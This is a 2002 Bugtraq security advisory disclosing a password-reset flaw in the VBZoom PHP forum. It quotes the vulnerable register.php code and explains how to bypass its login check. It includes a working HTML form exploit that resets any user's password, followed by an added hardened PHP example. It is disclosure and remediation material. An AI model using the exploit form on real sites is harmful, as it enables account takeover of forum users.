[27346] in bugtraq
Reset any user's password in VBZoom forums
daemon@ATHENA.MIT.EDU (hish _ hish)
Tue Oct 8 17:13:46 2002
Date: 8 Oct 2002 19:41:07 -0000
Message-ID: <20021008194107.4341.qmail@mail.securityfocus.com>
Content-Type: text/plain
Content-Disposition: inline
Content-Transfer-Encoding: binary
MIME-Version: 1.0
From: hish _ hish <hish_hish565@hotmail.com>
To: bugtraq@securityfocus.com
Name: VBZoom
Version Affected: tested on v1.01; other versions may also be vulnerable
Severity: Critical
Category: Password reset
Vendor URL: http://www.vbzoom.com
Author: hish_hish <hish_hish565@hotmail.com>
Date: disclosed on 28th August 2002
Published: 8th Oct 2002
Description
***********
VBZooM is a bulletin board system written in PHP.
The problem lies in an SQL query in the file register.php,
which lets you reset any user's password (see Details).
Details
*******
See these few lines from register.php:
1: If ($ChangeProfile==1 And ($VBZooMForumCookiesUserName=="" or
2: $VBZooMForumCookiesUserName=="deleted"))
3: {
4: include("admin/config.php");
5: include("style/style.php");
6: Echo"<BR>";
:
:
9: include("login.php"); // wooow here will catch us, so we want to pass this block.
:
:
10: Exit();
11: }
:
:
14: if ($REQUEST_METHOD=="POST")
15: {
16: if($ChangeProfile==1 And $UserName!="")
17: {
18: include("admin/config.php");
19: $Connect =mysql_connect($DBHostName,$DBUserName,$DBPassword);
20: $Select =mysql_select_db($DBName,$Connect);
:
:
:
24: $Sql = "UPDATE Member Set Password='$Password',Email='$Email',
        Gender='$Gender',Style='1',HomePage='$HomePage',Photo='$Photo',
        Icq='$Icq',Hotmail='$Hotmail',
        Yahoo='$Yahoo',BirthDate='$BirthDate',Country='$Country',Hobby='$Hobby',
        Job='$Job',Signature='$Signature',AllowEmail='$AllowEmail',
        AllowMail='$AllowMail',AllowMessage='$AllowMessage',
        AllowMailCaseMessage='$AllowMailCaseMessage' where
        UserName='$UserName'";
31: $Result = mysql_query($Sql);
32: If ($Result)
33: {
34: setcookie ("VBZooMForumCookiesUserName","$UserName",time()+604800);
35: setcookie ("VBZooMForumCookiesPassword", "$Password",time()+604800);
We don't want to execute the block between lines 3 and 11, so we pass
invalid values to the if statement (line 1).
The lame SQL statement lies at line 24, and it's inside the block (lines 14
to 35).
So we will pass valid values to reach the SQL statement as follows:
make <form method="POST" action="register.php"> // to enter the block at line 14
assign 1 to the variable $ChangeProfile, and the victim's UserName to reset his
password
lines 18 - 20 no comment !!
lines 24 - 35 :)
Exploit code
**************
<form name="f1" action="http://www.victim.com/vbzoom/register.php" method="POST">
<input type="hidden" name="ChangeProfile" value="1">
User Name: <input type="text" name="UserName"><br>
Password: <input type="text" name="Password"><br>
Email: <input type="text" name="Email">
<input type="hidden" name="HomePage" value="lamerZ">
<input type="hidden" name="VBZooMForumCookiesUserName" value="false">
<input type="hidden" name="VBZooMForumCookiesUserName" value="false">
<input type="submit" value="reset password">
</form>
Fix Information
***************
Contact http://www.vbzoom.com
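As an added example (not VBZoom's code and not part of the original post), here is a hardened profile-update handler written against the two defects in the register.php excerpt above: the identity being updated comes from the request, and the guard variable can be overwritten by the same request. It assumes a session that stores the logged-in user's id in $_SESSION['user_id'], a mysqli connection in $db, and a Member table with an integer Id column alongside the Password and Email columns named in the advisory.

```php
<?php
// Added example, not VBZoom code. Assumes $db is a connected mysqli
// object and Member has columns Id (int), Password, Email.
session_start();

if ($_SERVER['REQUEST_METHOD'] !== 'POST') {
    http_response_code(405);
    exit;
}

// 1. Identity comes from the server-side session, never from the
//    request. The original used $UserName straight from the POST body
//    (register_globals), so the client chose whose row to update, and
//    the "logged in" check read a variable the same POST could set.
if (empty($_SESSION['user_id'])) {
    header('Location: login.php');
    exit;
}
$userId = (int) $_SESSION['user_id'];

// 2. A password change must prove knowledge of the current password.
$stmt = $db->prepare('SELECT Password FROM Member WHERE Id = ?');
$stmt->bind_param('i', $userId);
$stmt->execute();
$stmt->bind_result($storedHash);
$found = $stmt->fetch();
$stmt->close();
if (!$found || !password_verify($_POST['CurrentPassword'] ?? '', $storedHash)) {
    http_response_code(403);
    exit('Current password does not match.');
}

// 3. Store a salted hash and bind every value instead of interpolating
//    it into the SQL string as the original $Sql did.
$newHash = password_hash($_POST['Password'] ?? '', PASSWORD_DEFAULT);
$email   = $_POST['Email'] ?? '';

$stmt = $db->prepare('UPDATE Member SET Password = ?, Email = ? WHERE Id = ?');
$stmt->bind_param('ssi', $newHash, $email, $userId);
$stmt->execute();
$stmt->close();

// 4. The original copied the new password into a cookie; the session
//    already identifies the user, so nothing secret is sent back.
echo 'Profile updated.';
```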